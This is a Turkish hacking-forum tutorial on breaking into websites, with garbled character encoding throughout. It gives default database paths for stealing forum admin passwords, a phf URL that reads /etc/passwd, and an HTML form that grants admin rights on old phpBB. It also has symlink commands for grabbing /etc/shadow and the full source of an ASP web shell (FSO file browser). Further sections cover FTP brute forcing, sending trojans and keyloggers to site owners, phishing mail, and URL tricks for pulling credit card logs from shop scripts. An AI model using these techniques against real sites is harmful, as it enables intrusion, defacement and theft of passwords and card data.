Web Hack Anlatımlı

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

__EsCobAR__18

Katılımcı Üye
15 Eyl 2006
288
10
Selamlar.Bu dökümanda size web hackle ilgili yararli olduguna inandigim bilgileri verecegim.Bu dökümany uygalamaya
dökemeseniz bile bu islerin mantigini bir parca olsun anlayabilirsiniz.
Bir siteyi hacklemek için kullanabileceginiz birçok yöntem var.Bunlardan bazilari:

*Güvenlik Aciklari(asp*php*cgi*phf vb. gibi)

*Exploitler

*Fso(NtDaddy)*listpathler

*Bruteforce

*Wordlist

*Birebir Baglanti(trojanlar vs)

*Fakemail

*Flood

Simdi bunlari teker teker inceleyelim:

_____GUVENLIK ACIKLARI:_____

Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri*mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
www.forumunadresi.com/admin/wwwforum.mdb olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün*gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
www.forumadresi.com/snitz_forums_2000.mdb adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
www.siteadresi.com/db/main.mdb den database'e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar

/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi

Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari

.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t's CGI scanner'dyr.

Php Sistemlerinin aciklari:
Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
/ml_config.dat ekLeyerek admin ?ifresine uLa?abiLirsiniz.
bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
anlamaniza yardimci olacagina inaniyorum.
<form method="post" action="http://forum sayfasy/admin/admin_ug_auth.php">



User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5">

<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />

</form>
</body>
</html>

Cgi scriptleri acigi:
WEBBS de bulunan bir acik.
http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/

Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
Açyk : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt

WWWBoard Scriptleri:
Açyk : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açyk : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açyk : http://www.hedefsite.com/webboard/password.txt

Biraz da phfden bahsetmek istiyorum:
96'da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
http://KIRACAGIMIZADRES/cgi-bin/phf...0a/bin/cat%20/e tc/passwd yaziyoruz browsera.ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:
www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
yada
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.

_____EXPLOYTLER:_____

Çok kullanicili isletim sistemlerinde*sitelerde size bir boslugu kullanarak özel yetkiler vermek icin yazilan programlara
exploit adi veriyoruz.Exploit bize belirli bir sistemde yöneticilik ünvani verir.Bu ünvanlar NT'de administrator*Novell'da
supervisor*UNIX de clone yada root olarak siralanabilir.Yki tür exploit bulunur bunlar remote(sistemin parcasi olmadan
kullabileceginiz exploitler) vede local(kullanmak icin sistemin bir parcasi olmaniz gerekenler) olarak siralanabilir.
Exploitler * sistemde ki buglar sayesin de r00t seviyesine çykabilmek için yazylmy? programlardyr.
Cok yakinda bir cok exploiti TuzakONLINE.com'da bulabileceksiniz.
Bagzi örnek exploitler vermek istiyorum :
"overflow" exploiti (FreeBSD'de lprm açy?y):Overflow exploitler www.securiteam.com adresinde bol bol bulunmaktadir.Pointer
artimeti?ini kullanarak (Pointer de?i?kenler de?i?kenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon
belle?e (buffer) bir string kopyalayarak ta?ma olu?turur. Sistemdeki lprm komutunu kullanyr. lprm komutu uzaktaki bir
yazycyya gönderilen bir i?i iptal etmeye yarar. "lprm -P bloggs" komutuyla i? iptal edilebilirken kuyruktaki ikinci bir
i? ayny anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatasy meydana getirir. Bu sayede "root"
eri?imi sa?..yr. Lokal bir exploittir.
Derleyici ve /tmp Hatalary (Solaris'de gcc tempfile açy?y): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde
/tmp dizinine (geçici i?lemlerin yürütüldü?ü dizin. Windows dizini altyndaki temp dizini gibi) sembolik link
(bir dosyaya ya da dizine ula?abilmek için konan linkler. Windows'taki .lnk dosyalary gibi) olu?turulur ve bu
linkten yararlanarak lokal root hakky alynyr.
Program Hatalary (Linux'daki X11Amp Programy açy?y): X11Amp çaly?tyryldy?ynda ~./X11amp isminde bir dosya olu?turur.
Bu hatayy linux'ta ?öyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl
Bu komutlary yazdyktan sonra X11Amp'i çaly?tyryp "ekl" 'yi seçin bütün giri?leri seçip silin. Program çakylacak ve
/etc/shadow dosyasyny alabileceksiniz.
Microsoft'un FrontPage Server Extensions'unda kar?yla?y.. açyklar: Frontpage extensions'un kullanyldy?y web sitelerinde
pek çok açyk bulmak mümkün* örne?in Frontpage 98'de dizin eri?im haklary iyi düzenlenmedi?i için _vti_pvt dizini
"WORLD WRITABLE" olarak düzenlenmi?. _vti_pvt dizininde ise "service.pwd" dosyasynda ?ifreler tutulmakta

_____FSO(NTDADDY)*LISTPATH:______

Ço?umuz elmali ?eker yada sadece ?eker diye tanidik.Bir hostta kiralanan bir yere upload edilen bir asp kodudur.Bize Hosttaki tüm
domainlere eri?im hakki saglar.Piyasada bir çok FSO kodu bulabilirsiniz.Belesh domain ve hostlarda bosuna denemeyin ise
yaramaz.Yeni listhpathler icin syk syk hack sitlerini ziyaret etmenizi öneririm.Örnek bir Fso kodu yaziyorum.Su an Calisip calismadigindan emin degilim ama ileri derecede asp biliyorsaniz isin
mantigini kaparsiniz
<%@ Language=VBScript %>
<%
Option Explicit

Dim giCount
Dim gvAttributes

Dim Ext

Dim ScriptFolder
Dim FolderPath

Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File

Dim BgColor* BackgroundColor*FSO

If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFolder Request.QueryString("CopyFolder") & "*"* "d:"
End If

If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile")*
"d:"
End If

Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")

FolderPath = Request.QueryString("FolderPath")

If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If

FolderPath = ParseFolder(FolderPath)

ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLAT ED")) & "images"

%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
BACKGROUND-COLOR: #C0C0C0
FONT-FAMILY: 'MS Sans Serif'* Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
TD*INPUT*SELECT
{
FONT-FAMILY: 'MS Sans Serif'* Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<body bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":"""
If InStr(UCase(FolderPath)* Drive.DriveLetter & ":") > 0 Then Response.Write "
selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>"
style="width:100%">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>


<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center"
style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?Folde rPat h=<%=Server.URLPathEncode(Folder.Drive
& "")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?Folde rPat h=<%=Server.URLPathEncode(Folder)%>"><font
face="wingdings" size="4"></font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href=
"<%=Request.ServerVariables("script_name") & "?FolderPath=" &
Server.URLPathEncode(FolderPath & SubFolder.Name & "")%>"><font face="wingdings"
size="4">0</font> <%=SubFolder.Name%></a> (<a href=
"<%=Request.ServerVariables("script_name")%>?CopyF olde r=<%=Server.URLPathEncode(FolderPath
& SubFolder.Name)%>&FolderPath=<%=Server.URLPathEnco de(FolderPath & "")%>">Copy</a>
</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModi fied%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)% > </td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href=
"showcode.asp?f=<%=File.Name%>&FolderPath=<%=S e rver.URLPathEncode(FolderPath)%>"
target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a
href=
"<%=Request.ServerVariables("script_name")%>?CopyF ile= <%=File.Name%>&FolderPath=<%=Server.URLPathEnco de(FolderPath
& "")%>">Copy</a> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td& amp; gt;
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified% ></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></ td>
</tr>
<%Next%>
</table>
</body>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber* ByVal MaxValuePerIndex* ByVal
MinUpperBound* ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex
- 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function

Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "#efefef"
Else
BgColor = "#ffffff"
End If
End Sub

Private Function Attributes(AttributeValue)
Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue* 1* 7* "*")* "*")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
Attributes = lsResult
End Function

Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName* liCount* 1) = "." Then
lsExt = Right(FileName* Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function

Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString* 1) = "" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString* liCount* 1) = "" Then
ParseFolder = Left(PathString* liCount)
Exit For
End If
Next
End If
End Function
%>


_____Brute Force:_____

Bu teknik icin öncelikle dua edin ki ftp sifresi az haneli olsun.Brute force icin kullanabileceginiz program Brutus AET2 dir
ki bu tuzakonline.com'da mevcuttur.Brute force un mantigi cok basittir.Brutus olabilecek kombinasyonlari cok hizli bir
sekilde dener.Ama bu özellikle sifre cok haneliyse ki muhtemelen öyledir*çok uzun zaman alir.Ba?ariya ulasma olasiligi
dü?ük olsa bile buldugu sifre nin calismama olasiligi yoktur .Size FTP sifresini verir.Buldugunuz sifre ile bence tüm
dosyalari silin kendi hazirladiginiz indexi koyun.

_____Wordlist:_____

Wordlistler icinde bir cok sözcügün bulundugu basit dosyalardir.Siz brute forcerlarla cok hizli bir sekilde elinizdeki
wordlistteki kelimeleri denersiniz.Wordlistler tahminen 5-10 bin kelimeden olusurlar ve eger elde etmeye calistiginiz ftp
sifresi bu wordlistler icindeyse sifreyi bulursunuz.Basariya ulasma olasiligi düsüktür.uldugu sifre nin calismama olasiligi
yoktur

_____Birebir Baglanti(trojanlar vs):_____

Lamer teknigidir bastan söylemem gerekli .Sitenin sahibiyle kurdugunuz basarili bir muhabbet sonucu elinizdeki trojan
serverini bence bir dosya ile birlestirip karsinizdaki kullaniciya yollayin.Site sahibinin makinasina baglandiktan sonra
bilgisayarina bir keylogger atin.Belirli araliklarla bilgisayarina girip log dosyasini kendi bilgisayariniza cekin.
Arada sitesinin passwordunu bulabilirsiniz.Bir di?er yöntem de Turkojan kullanarak mümkündür ki o daha saglikli dir.
Adamin bilgisayarina baglanip keyloggera calistirin .Sonra onunla sohbet edip bir sekilde sitesine ftp den erismesini
saglayin.Nasilsa sifresini girecektir.Sifresizce
not:Adamin sifreleri bilgisayarindaki password managerlarda kayitliysa yöntem basarisiz olur .Zaten eger basarili bir
webmastersa büyük ihtimalle serveri yemez .Site HTML falansa acik kullanamiyorsaniz deneyeblirsiniz.

_____Fakemail:_____

Mail site sahibi bakimindan büyük önem tasir.Genelde kullanilan Lame teknik adamin mailini hackleme hosttan sifre
istetmektir.Yine de denenebilen opsiyonlar arasindadir.Siteye Whois Cekip client maili(webmaster) hacklemeye calisin.
Hotmail*yahoo*usa.net*mynet fakemail kodlarini asagi yukari köklü her forumdan kolayca telep edebilirsiniz.Ycine lycostan bi
mail form kodu koyarsaniz rahatca adama fake atabilirsiniz.Fakat eger adamin maili POP3 falansa ki eger
www.spymastersnake.org[/URL] bir Top-Level domaindir. “Spymastersnake.org” kysmy domainin adydyr. *.org kysmy domainin hangi level oldu?unu belirtir. http://www.*/www.*[/URL] kysmy ise* domainin gösterdi?i Ipdeki www klasör veya hizmetinin yoludur. Domain Name her zaman bir Ipnin yerini alyr. Bu IP ise bir bilgisayara ait olan* ve o bilgisayaryn internete eri?imini sa?layan numaradyr. Her internete ba?lanan makinaya verilen ve birbirinden farkly olan bu numaraya* internet protokolü numarasy denir.

Host: Ynterenete sürekli ba?ly olan* belli bir ipsi olan ve içinde internette yayynlanacak dosyalary baryndyran* multi-user i?letim sistemi baryndyran ve farkly kullanycylaryn* biribirinden ba?ymsyz kullanabilecekleri bir bilgisayardyr. E?er siz kendi bilgisayarynyza bu i?letim sistemlerinden birini kurup* makinanyzy ayarlarsanyz bu makine sizinki bile olabilir.

Bu makinalarda web sunucusu dedi?imiz programlar bulunur. Bu programlar sayesinde sizin herkese payla?yma açaca?ynyz internette yayynlayaca?ynyz sitenin dosyalaryny 80 numaraly port üzerinden yada ba?ka bir port üzerinden web tarayycylarynyn okuyabilece?i ?ekilde yayynlanabilir.

Bir web sitesi aldy?ynyzda* aldy?ynyz yer size bir bilgisayarda hesap açar. Bu hesap sizin dosyalaryny koyabilece?iniz bir hesaptyr. Bu hesap sayesinde size izin verilen ?eyleri yapabilirsiniz. Örne?in izin verilen miktarda dosyalarynyzy koyabilir* yayynlayabilir veya kar?y makinede dosyalarynyzy çaly?tyrabilir* irc server gibi ?eyler kurabilirsiniz. Yada ?u anda geocities gibi yerlerin yapty?y sadece dosyalarynyzy depo edip* yayynlanmasyny sa?layabilirsiniz. Yani bu web yayymcyly?ynyn en temel ve basit i?ini yapmy? olursunuz.

Ancak web yayymcyly?y daha karma?yk ve daha çok ?ekilde yapylabilmekte. Bunlary sa?layan ?eylerin ba?ynda script dedi?imiz* web browserlaryndan yollanan komutlarla kar?y makinada çaly?an uygulamalardyr. Bir script* synyrlandyrylmy? bir *.exe uygulamasy gibi çaly?yr. Belli bir yorumlayycysy vardyr ve tüm görevleri bu yorumlayycy yapar. Scriptte ise bu yorumlayycynyn anlayaca?y komutlar vardyr. Bu yüzden yapty?ynyz uygulamanyn synyrlary bu yorumlayycynyn yeteneklerine ba?lydyr. Bilinen en yaygyn yorumlayycylar ASP* PHP ve Perl yorumlayycylarydyr.

Ayny ?ekilde size verilen bir hesapta* bazy normal *.exe uygulamalary yada ortamyna göre sadece uygulama çaly?tyrabilir* bunlarla oyun serverlary* chat serverlary kurabilirsiniz. Elbette bu aldy?ynyzyn hostun yeteneklerine ba?lydyr.

Böylece internete ba?ly bir bilgisayary bazy server uygulamalary sayesinde internette bilgi payla?abilen bir sistem haline getirip* adyna web sunucusu yada host demi? oluyoruz. Bir host içinde yüzlerce kullanycy ve buna ba?ly olarak yüzlerce web sitesi baryndyrabilir. Bunun böyle olmasy sa?layan ?ey ise Domain Name Server dedi?imiz sistem ve Multi-User dedi?imiz* i?letim sistemleridir.

Kysaca bilmeyenler için* bir web sitesi için gereken bir server yazylymy ve internete ba?ly bir bilgisayar diyebiliriz. Ancak gerçekte durum daha Complex bir haldedir. Bu complex yerle?im ise bu sistemleri iyi bilen ki?iler için bazy avantajlar sa?lamakta ve ba?kasynyn sahip oldu?u sistemlere bile onlaryn istemleri dy?ynda hükmetme ?ansy vermektedir.

?imdi kysaca ?u anda Türkiye’de Hack ady altynda dola?an* insanlaryn Hack ettim diyerek övündü?ü basit ve karma?yk olmayan sistemleri açyklamakta. Bunlaryn ba?lycalary ?unlardyr:

Mass Scannerlar: En yaygyn olany son dönemde budur. Bazy scannerlar* internetteki ipleri yani bilgisayarlary tarayarak* onlaryn payla?ym izni olup olmady?yny ve ftp gibi protokolllerinde eri?im izinlerine Anonymous kullanycylara izin verip vermedi?ini kysa zamanda tarayyp bulan scannerlardyr. Netbios ve Vulnerability scanner diye bir kaç türleri vardyr. Kullanycynyn bilgili biri olmasy gerekmez. Tek yapaca?y ip araly?yny girip tarama yapmasydyr. Ayny ?ekilde scriptlerdeki açyklary ve hatalary bulmak hazyrlanmy? scannerlarda vardyr. Bunlarla mesela* internette bulunan Aly?-Veri? scriptlerinin bilinen açyklary veya Permission ayarlary hatalaryyla kredi kartlary bilgilerine ula?ym yapylmaktadyr. Oldukça kolay ve basit bir?eydir. Bir mass scanner çok iyi Up ve Down stream ba?lantyya ihtiyaç duyar. DSL ve Tx ba?lantylar biçilmi? kaftandyr.

E?er internette gecede 100-200 site hack ettik yada saatte 1000 site hack ettik gibi ?eyler görürseniz* bunlaryn Mass toolarla sadece butonlara basylarak yapyldy?yny rahatlykla söyleyebilirsiniz. Özellikle bu hack edilen sitelerin bir ortak yany olmaz. Di?elim bu 1000 siteyi hack etmi? adama 1 site adresi verseniz onu hack edemedi?ini görebilirsiniz. Çünkü kendi rastgele belli ip aralyklaryny tarayarak bu i?i yapmy?tyr* belki hack edilen sitelerin adyny kendi bile daha önceden duymamy?tyr. Diyelimki sadece Amerikan sitelerini hack edicek biri* Amerikan hostlarynyn bulundu?u ve bulunabilece?i* belli Amerikan IP aralyklaryny tarama yapar ve içinde açyklaryn oldu?u siteleri bularak i?lemi yapar. Böylece saatte ba?lanty hyzyna göre 1000 Amerikan sitesi hack edebilir. Ancak bu sitelerin ço?u uyduruk ki?isel siteler olacaktyr yada kendi çabasyyla hosting hizmeti vermeye çaly?an deneyimsiz insanlaryn siteleri olacaktyr.



Ba?ka bir ?ekilde de saatte yüzlerce site hack etmek mümkündür. Bunun için atak yapan ?ahys* içinde yüzlerce hesabyn bulundu?un bir Host’un açy?yny bulup* Root* Admin konumuna yada yetki düzeyi olacak bir konuma eri?mi? ise tüm hesaplary kitleyebilir yada hesaplaryn indexlerine eri?im varsa* hazyrlayaca?y ufak bir uygulama ile tüm indexleri de?i?tirebilir. Diyelim ki permission ayarlary yapylmamy? ve tüm kullanycylarynyn Home klasörleri chmod 777 gibi bir izinle hazyrlanmy? bir hostta* açaca?ynyz yada alaca?ynyz bir hesapla* bir script yazmanyz yada hostun i?letim sistemine göre bir uygulama yazmanyz sonucunda* tüm klasörlerdeki indexleri de?i?tirip* sistemi hack edilmi? havasyna sokabilirsiniz. Bu i?i e?er hostta 1000 site varsa* hepsine yapmy? ve ayny anda yüzlercesini hack etmi? olursunuz... Bu verdi?im örnek bile en azyndan yetenek isteyen bir örnektir ancak yukaryda verilen tool örne?i herkesin yapabilece?i ve hali hazyrda tüm hack sitelerinin kullanycylaryn gözünü boyamak ve kendilerini tatmin etmek için kullandyklary yöntemdir. Bilgisayar bilimi hakkynda bilgisi olmayan ki?iler ise bu insanlaryn arkasyndan gitmeye çaly?makta ve onlaryn a?laryna dü?mektedirler. Unutmayyn ki bu i? sihirle yapylmyyor. Size manty?y açyklanmamy? hiçbir hack giri?imini gerçek sanmayyn.



Fake Yollarla: Özellikle bedava siteler da?ytan geocities gibi yerlerden sitesi olan ki?ilerin sitelerini çalmak için kullany.. yöntemdir. Ki?inin mail adresine sahte ?ifre isteyen mailler yollanyr yada user’yn hesabynda ?ifreler denenir. Hiç bi?ey yapamayan lamer siteyi ?ikayet etmekte bulur çareyi. E?er User ile bir chat ortamynda ba?lantysy varsa ona bir Trojan yada Keylogger yollayarak ?ifreyi almaya çaly?yr. Ynternet kafe gibi ortamlarda user ve oturdu?u makineleri takip ederek ?ifreyi almaya çaly?yr. Buda çok kullany.. bir yöntem. Her zamanki gibi bilgisayar bilimi ile ilgisi olmayan ki?ilerin yolu veya kar?ysyndaki user’y bilgisi az olunca denen yoldur.

Script Açyklary: Bilinen scriptlerin açyklaryyla* sistemdeki bir ?ifreye ula?arak yapy.. yöntemdir. Örne?in bir forum scriptinin admin ?ifresini ele geçirip* bu ?ifreyle sistemin di?er yerlerine ula?yp* forumun anasayfasyny de?i?tirme* ?ifre FTP ?ifresiyle ayny ise siteyi ele geçirme gibi* bilinen ve hala kullany.. yöntemlerdir. Bunlar için bir örne?i 2001 yylynda yazyp yayynlady?ym kredi kartlarynyn çalynmasy ile ilgili bir yazydan alynty yaparak vermek istiyorum bu örnek Permission açyklary ile ilgili bölüm içinde geçerlidir.:

------------------------------------------------------------ ------------------

“..........Y?te Log Kurulumlaryndan do?an açyklardan çykan riskler...

Bu yöntemde zor olan tek bir yer var o da CClerin hangi program tarafyndan alynyp log edildi?ini bulmak. Programy bulduktan sonra ise ona bazy parametreler girerek onun log dosyasyny bulmak. Zor de?il* kolay. Bazy web siteleri bile bu yöntemlerle hack ediliyor. Yapylmasy gereken ?ey scripte bazy parametreler girerek istenene ula?mak.

?imdi* ilk i? kyytyryk ama CC ile aly?veri? yapy.. bir site bulmak ve bu sitenin CC verilerinin girildi?i alana gitmek. Kar?ynyza CClerin girildi?i form alany gelince kayna?y görüntüleyip* içindeki POST methodunun bulundu?u yere bakyn. Diyelim ki ?u an zaten çaly?an ve aktif olan [URL="https://tik.lat/829mp"] http://www.xxxx.com/cgi-local/shopper[/URL] linkini POST verisinin yollanaca?y yerde buldunuz. Y?te o zaman bu durumda ?ans dileyip ?unlary deneyin:

Orda yazan URLyi kopayalayn* e?er URL yerinde "/cgi-local/shopper" yazyyorsa ba?yna sitenin adresini koyun* yani [URL="https://tik.lat/MPOHS"] http://www.xxxx.com[/URL] daha sonra URLyi browserynyzyn git çubu?una yapy?tyryn. ?imdi LOG'u bulmaya çaly?caz* ilk önce bu adrese ?u TAGlary ekliycez* [URL="https://tik.lat/PnbwQ"] http://www.xxxx.com/cgi-local/shopper?search=action[/URL] bu sayede scriptten bir arama yapmasyny istiycez. Tabii ki aryycak ama ne? tabii ki ufak bir keyword* arama yapmamyzyn nedeni* log'u görüntülemek için ba?ka ?ansymyzyn olmamasy. Çünkü log'u print edecek bir girdi giremiyoruz* bunun için her zaman otomatik print yapan search tagyny kullanyyoruz.

Bunun üstüne bir keyword girdisi ve üstüne de aranacak harfleri giriyoruz [URL="https://tik.lat/3gNmr"] http://www.xxxx.com/cgi-local/shopp...ion&keywords=ye[/URL] ye ?u an yeye yazdyk ve yeye kelimesini aratmaya ba?ladyk ama nerde; Bunun için asyl kary?yk olan kysmy yapycaz ve yapy.. aly?veri?lerin nerede LOGlandy?yny bulucaz. Y?te bu durumda devreye zeka giriyor ve denemeye ba?lyyoruz.
[URL="https://tik.lat/9XkdR"] http://www.xxxx.com/cgi-local/shopp...ion&keywords=ye[/URL] ye%20&template=sales.log diyoruz. Burdaki %20 bo?luk anlamyna* template ise aranacak kütüphane anlamyna geliyor ve tabii ki sales.log ise aranacak olan döküman. Deniyoruz ve tabii ki olmuyor çünkü sales.log yok. O zaman devam ediyoruz ve oraya sales.log yerine sale.log yazyyoruz deniyoruz* olmazsa sell.log yazyyoruz* olmazsa order.log yazyyoruz ve tatam* oldu Y?te bütün log kar?ynyzda* yada ?öyle diyim* bütün log de?il yanlyzca içinde yeye kelimesi olanlar kar?ynyzda... Yukarda anlatylyrken kullany.. taglar de?i?ebilir.

Mesela* ?search=actin yerine ?action=search olabilir. yada direkt ?search de olabilir bunu bilmeyeiz bu yüzen deniycez. Mesela keywords yerine keyword de olabilir. Sonuç URL [URL="https://tik.lat/rC4ZP"] http://www.xxxx.com/cgi-local/shopp...ion&keywords=ye[/URL] ye%20&template=order.log

?u ana kadar anlatty?ym Shopper.Cgi için olan açykty. Birde Cart32.exe gibi windows için hazyrlanmy? olan scriptin açy?y var. Onun hack edilmesi daha kolay.Cart32 kullanan bir sitede [URL="https://tik.lat/koxao"] http://www.michaeljackson.com/cgi-bin/cart32.exe[/URL] olarak scripti buldu?unuzda* bunu [URL="https://tik.lat/O7H3W"] http://www.michaeljackson.com/cgi-b...herhangibisi-OR[/URL] DERS.txt yada OUTPUT.txt olarak girerek CClere ula?abilirsiniz. Tabii dedi?im ORDERS ba?ka bi?i de olabilir ama genelde orders dyr.

Ayryca Cart32 de CC dy?ynda:

Admin ?ifresi için-> [URL="https://tik.lat/GciTK"] http://www.michaeljackson.com/cgi-b...t32/[/URL])cart32.ini

